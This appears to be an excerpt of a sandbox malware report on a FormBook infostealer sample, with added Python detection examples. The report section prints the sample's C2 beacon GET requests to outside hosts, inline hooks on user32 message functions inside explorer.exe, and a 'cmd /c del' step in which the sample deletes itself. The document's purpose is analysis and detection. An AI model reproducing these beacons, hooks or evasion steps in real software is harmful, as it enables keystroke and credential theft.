                                                Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 42 72 65 78 5a 65 49 7a 6e 56 41 72 4a 64 59 35 6e 59 45 39 41 54 69 4b 45 6e 71 35 75 6d 56 67 77 79 4d 42 74 64 7a 30 59 4c 54 70 57 77 7a 74 67 6c 7a 2b 48 4a 49 6f 55 45 6b 79 5a 49 6c 52 71 37 57 38 31 41 67 6e 63 6d 6a 71 76 42 65 6d 48 4e 4a 4b 6a 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 
5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BrexZeIznVArJdY5nYE9ATiKEnq5umVgwyMBtdz0YLTpWwztglz+HJIoUEkyZIlRq7W81AgncmjqvBemHNJKjw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49753 | 198.54.117.216 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:12:15.271634102 CET | 10592 | OUT | GET /uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI HTTP/1.1
                                                Host: www.concur.design
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
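The two explorer.exe requests above share the traits the report's signature list calls out (HTTP GET without a User-Agent, Connection: close, a short path carrying a long base64-looking query value, and almost no other headers). The following is an added example and not part of the Joe Sandbox report: a small Python checker that parses raw request dumps and counts those traits, run over the two requests reproduced above plus a constructed benign browser request for contrast. The indicator names, the regular expressions and the threshold are this example's own choices, not something the report defines.

```python
import re
from urllib.parse import urlsplit

# Raw request dumps. The first two are the explorer.exe requests reproduced in
# the report above; the third is a CONSTRUCTED benign browser request added for
# contrast and does not appear in the report.
SAMPLE_REQUESTS = [
    "GET /uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI HTTP/1.1\r\n"
    "Host: www.demenageseul.com\r\n"
    "Connection: close\r\n\r\n",
    "GET /uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI HTTP/1.1\r\n"
    "Host: www.concur.design\r\n"
    "Connection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: text/html\r\n"
    "Connection: keep-alive\r\n\r\n",
]

# A long run of base64 alphabet with optional padding (this example's own heuristic).
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
# A single short directory with the request data pushed into the query string.
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, {lowercase header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def query_params(target):
    """Split the query by hand: parse_qsl would turn '+' into a space and break base64."""
    query = urlsplit(target).query
    return [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]


def beacon_indicators(raw):
    """Names of the beacon traits present in one request (empty for a normal browser)."""
    method, target, headers = parse_request(raw)
    params = query_params(target)
    hits = []
    if "user-agent" not in headers:
        hits.append("no_user_agent")
    if headers.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if SHORT_DIR.match(urlsplit(target).path) and params:
        hits.append("short_dir_with_query")
    if any(BASE64_BLOB.match(value) for _, value in params):
        hits.append("base64_blob_param")
    if len(headers) <= 2:
        hits.append("minimal_headers")
    return hits


def is_beacon(raw, threshold=3):
    """Flag a request once it shows at least `threshold` of the traits above."""
    return len(beacon_indicators(raw)) >= threshold


def c2_endpoint(raw):
    """(host, path) pair to block or watch once a request is flagged."""
    _method, target, headers = parse_request(raw)
    return headers.get("host", ""), urlsplit(target).path


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(c2_endpoint(req), beacon_indicators(req), "BEACON" if is_beacon(req) else "ok")
```

The first host answered with a domain-parking page (the adsense caf.js loader visible in the response dump above), which is why the shape of the request is a more durable detection than any single Host value: this family cycles through a list of candidate domains and most of them never answer with C2 content. Keep the threshold above one indicator; Connection: close on its own is common in legitimate clients.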


                                                Code Manipulations

                                                User Modules

                                                Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

All four hooks sit on the user32.dll message-retrieval APIs inside explorer.exe, the same process the network sessions above show issuing the C2 requests. Inline (prologue) hooks on these functions let the injected code see every window message, keyboard input included, before the host's own message loop handles it.

                                                Processes

                                                Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
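The hook table records only the first bytes now sitting at each prologue. As an added example that is not part of the report, the following Python compares a mapped prologue against a reference copy and names the detour when it starts with a well-known jump pattern; the report's "New Data" bytes are used as the observed side, while the reference prologue is constructed for the example and is not the real user32.dll code. The two Windows-only helpers at the end are the collection side of such a check and assume user32.dll is mapped at the same base in every process of a boot session, which is how the address resolved locally becomes valid in the target.

```python
import sys

# Detour byte patterns commonly written over a function prologue by user-mode
# inline hooks. Only the leading bytes are matched here.
HOOK_PATTERNS = [
    ("jmp rel32", b"\xE9"),
    ("jmp [rip+rel32]", b"\xFF\x25"),
    ("mov rax, imm64 / jmp rax", b"\x48\xB8"),
    ("push imm32 / ret", b"\x68"),
    ("int3 trap", b"\xCC"),
]

# "New Data" from the report's hook table above: the first six bytes of each
# hooked user32.dll export as mapped inside explorer.exe.
OBSERVED_IN_EXPLORER = {
    "PeekMessageA": b"\x48\x8B\xB8\x8A\xAE\xE3",
    "PeekMessageW": b"\x48\x8B\xB8\x82\x2E\xE3",
    "GetMessageW":  b"\x48\x8B\xB8\x82\x2E\xE3",
    "GetMessageA":  b"\x48\x8B\xB8\x8A\xAE\xE3",
}

# CONSTRUCTED reference prologue (an assumption for this example; these are not
# the real user32.dll bytes). A real check takes the reference from the on-disk
# DLL or from a known-clean process.
CLEAN_PROLOGUE = b"\x48\x83\xEC\x38\x48\x8B"
REFERENCE = {name: CLEAN_PROLOGUE for name in OBSERVED_IN_EXPLORER}


def classify_prologue(reference: bytes, observed: bytes) -> str:
    """Compare the mapped prologue with the reference; name the detour if it is a known one."""
    if observed == reference:
        return "clean"
    for label, signature in HOOK_PATTERNS:
        if observed.startswith(signature):
            return f"hooked ({label})"
    # Bytes differ but do not start with a classic detour: still report it,
    # because a pattern-only scanner would miss exactly this case.
    return "modified (unrecognized pattern)"


def scan_exports(reference: dict, observed: dict) -> dict:
    """Classify every export present in both maps."""
    return {
        name: classify_prologue(reference[name], observed[name])
        for name in observed
        if name in reference
    }


def resolve_export(module: str, name: str) -> int:
    """Windows only: address of module!name in this process (same base in the target)."""
    if sys.platform != "win32":
        raise OSError("export resolution requires Windows")
    import ctypes
    mod = ctypes.WinDLL(module)
    return ctypes.cast(getattr(mod, name), ctypes.c_void_p).value


def read_live_prologue(pid: int, address: int, length: int = 16) -> bytes:
    """Windows only: read `length` bytes at `address` from process `pid`."""
    if sys.platform != "win32":
        raise OSError("live read requires Windows")
    import ctypes
    PROCESS_VM_READ = 0x0010
    k32 = ctypes.windll.kernel32
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.ReadProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    handle = k32.OpenProcess(PROCESS_VM_READ, False, pid)
    if not handle:
        raise ctypes.WinError()
    buf = ctypes.create_string_buffer(length)
    got = ctypes.c_size_t(0)
    ok = k32.ReadProcessMemory(handle, address, buf, length, ctypes.byref(got))
    k32.CloseHandle(handle)
    if not ok:
        raise ctypes.WinError()
    return buf.raw[: got.value]


if __name__ == "__main__":
    for fn, verdict in scan_exports(REFERENCE, OBSERVED_IN_EXPLORER).items():
        print(f"{fn:13s} {verdict}")
```

The recorded bytes do not begin with E9 or FF 25, so a scanner that only pattern-matches classic detours reports nothing for this sample; comparing against a trusted copy of the prologue is what catches them, and the unrecognized-pattern verdict is the one to escalate rather than ignore.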

                                                Statistics

                                                Behavior


                                                System Behavior

General (in.exe, first instance)

Start time: 21:09:49
Start date: 13/01/2021
Path: C:\Users\user\Desktop\in.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\in.exe'
Imagebase: 0xb40000
File size: 237568 bytes
MD5 hash: CC35BE28C18578D43849919AC1025D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General (in.exe, second instance)

Start time: 21:09:51
Start date: 13/01/2021
Path: C:\Users\user\Desktop\in.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\in.exe'
Imagebase: 0xb40000
File size: 237568 bytes
MD5 hash: CC35BE28C18578D43849919AC1025D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General (explorer.exe)

Start time: 21:09:55
Start date: 13/01/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff662bf0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General (NETSTAT.EXE)

Start time: 21:10:10
Start date: 13/01/2021
Path: C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase: 0xc30000
File size: 32768 bytes
MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General (cmd.exe)

Start time: 21:10:14
Start date: 13/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\in.exe'
Imagebase: 0x1240000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General (conhost.exe)

Start time: 21:10:15
Start date: 13/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
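The tables above list the chain as a sequence of processes without parent PIDs, so a triage script can only work from path, command line, start time and in-memory Yara hits. As an added example that is not the report's own logic, the following Python transcribes those six records and applies three rules: malware-family signatures inside a Windows system binary (NETSTAT.EXE here), cmd.exe /c del of the delivered sample, and the same image started again within seconds with more in-memory hits than the first run (the pattern behind the hollowing signature in the report header). The rule names, the five-second window and the "outside C:\Windows means sample" convention are this example's own assumptions.

```python
import re
from datetime import datetime

# Process records transcribed from the report's System Behavior tables above:
# start time, image path, command line, MD5 and the number of distinct memory
# regions (Yara "Source" entries) that matched a FormBook rule.
PROCESSES = [
    {"start": "21:09:49", "path": r"C:\Users\user\Desktop\in.exe",
     "cmd": r"'C:\Users\user\Desktop\in.exe'",
     "md5": "CC35BE28C18578D43849919AC1025D5A", "yara_regions": 1},
    {"start": "21:09:51", "path": r"C:\Users\user\Desktop\in.exe",
     "cmd": r"'C:\Users\user\Desktop\in.exe'",
     "md5": "CC35BE28C18578D43849919AC1025D5A", "yara_regions": 3},
    {"start": "21:09:55", "path": r"C:\Windows\explorer.exe", "cmd": "",
     "md5": "AD5296B280E8F522A8A897C96BAB0E1D", "yara_regions": 0},
    {"start": "21:10:10", "path": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "cmd": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "md5": "4E20FF629119A809BC0E7EE2D18A7FDB", "yara_regions": 3},
    {"start": "21:10:14", "path": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r"/c del 'C:\Users\user\Desktop\in.exe'",
     "md5": "F3BDBE3BB6F734E357235F4D5898582D", "yara_regions": 0},
    {"start": "21:10:15", "path": r"C:\Windows\System32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "md5": "EA777DEEA782E8B4D7C7C33BBF8A4496", "yara_regions": 0},
]

# "/c del <path>" with the path optionally wrapped in single or double quotes.
DEL_CMD = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+)['"]?""", re.IGNORECASE)
WINDOWS_DIR = "c:\\windows\\"
RELAUNCH_WINDOW_SECONDS = 5  # assumption for this example


def seconds_between(earlier, later):
    """Difference of two HH:MM:SS timestamps taken from the report tables."""
    fmt = "%H:%M:%S"
    return (datetime.strptime(later, fmt) - datetime.strptime(earlier, fmt)).total_seconds()


def sample_paths(procs):
    """Executables started from outside C:\\Windows: the delivered sample(s)."""
    return {p["path"] for p in procs if not p["path"].lower().startswith(WINDOWS_DIR)}


def triage(procs):
    """Return (rule, process path, detail) tuples for the behaviours worth escalating."""
    findings = []
    samples = sample_paths(procs)
    for p in procs:
        low = p["path"].lower()
        # cmd.exe /c del <sample>: the payload removing its own dropper from disk.
        if low.endswith("\\cmd.exe"):
            m = DEL_CMD.search(p["cmd"])
            if m and m.group("target") in samples:
                findings.append(("self_delete", p["path"], m.group("target")))
        # Family signatures inside a Windows system binary: code injected into it.
        if low.startswith(WINDOWS_DIR) and p["yara_regions"] > 0:
            findings.append(("malware_in_system_process", p["path"], p["yara_regions"]))
    # The same image (by MD5) started twice within the window, the second run
    # carrying more in-memory hits than the first.
    by_md5 = {}
    for p in procs:
        by_md5.setdefault(p["md5"], []).append(p)
    for md5, group in by_md5.items():
        for first, second in zip(group, group[1:]):
            gap = seconds_between(first["start"], second["start"])
            if 0 <= gap <= RELAUNCH_WINDOW_SECONDS and second["yara_regions"] > first["yara_regions"]:
                findings.append(("relaunch_within_seconds", second["path"], md5))
    return findings


if __name__ == "__main__":
    for rule, path, detail in triage(PROCESSES):
        print(f"{rule:26s} {path}  ({detail})")
```

Two of the three rules need a notion of "what is the sample", which in a sandbox report is the submitted file; on a live host the equivalent is the process whose image is not signed by the OS vendor or sits outside the Windows and Program Files trees, so the path convention above should be replaced by a signature or allow-list check before reuse.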

                                                Disassembly

                                                Code Analysis
